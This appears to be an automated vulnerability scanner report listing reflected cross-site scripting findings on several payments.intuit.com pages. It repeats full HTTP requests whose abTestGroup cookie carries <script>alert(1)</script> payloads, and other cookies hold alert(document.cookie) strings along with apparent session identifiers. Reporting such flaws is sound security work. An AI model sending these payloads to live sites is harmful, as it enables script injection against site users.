GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161e4c4"><script>alert(1)</script>961eb3d32b2;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload f2d55<script>alert(1)</script>c704fa6a9ea was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16f2d55<script>alert(1)</script>c704fa6a9ea;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d080e<script>alert(1)</script>76d20f74ae3 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d080e<script>alert(1)</script>76d20f74ae3;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8df"><script>alert(1)</script>8a97599db5e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163a8df"><script>alert(1)</script>8a97599db5e;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe34"><script>alert(1)</script>e4428afd0e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbe34"><script>alert(1)</script>e4428afd0e2;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e5954<script>alert(1)</script>7c1b1f23a20 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e5954<script>alert(1)</script>7c1b1f23a20;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 40826<script>alert(1)</script>6b3b3bfead2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1640826<script>alert(1)</script>6b3b3bfead2;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f63b"><script>alert(1)</script>2bccb2fa261 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/index.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161f63b"><script>alert(1)</script>2bccb2fa261;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ae697<script>alert(1)</script>aec6008fd49 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ae697<script>alert(1)</script>aec6008fd49;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 671c4"><script>alert(1)</script>a7dc609c67f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16671c4"><script>alert(1)</script>a7dc609c67f;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload ac6ae<script>alert(1)</script>299a08e1cc6 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16ac6ae<script>alert(1)</script>299a08e1cc6;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0c27"><script>alert(1)</script>2c3cad478e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16b0c27"><script>alert(1)</script>2c3cad478e;
The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 3b445<script>alert(1)</script>1d1b4924dde was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163b445<script>alert(1)</script>1d1b4924dde;
The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c3d"><script>alert(1)</script>97f3c4b0963 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
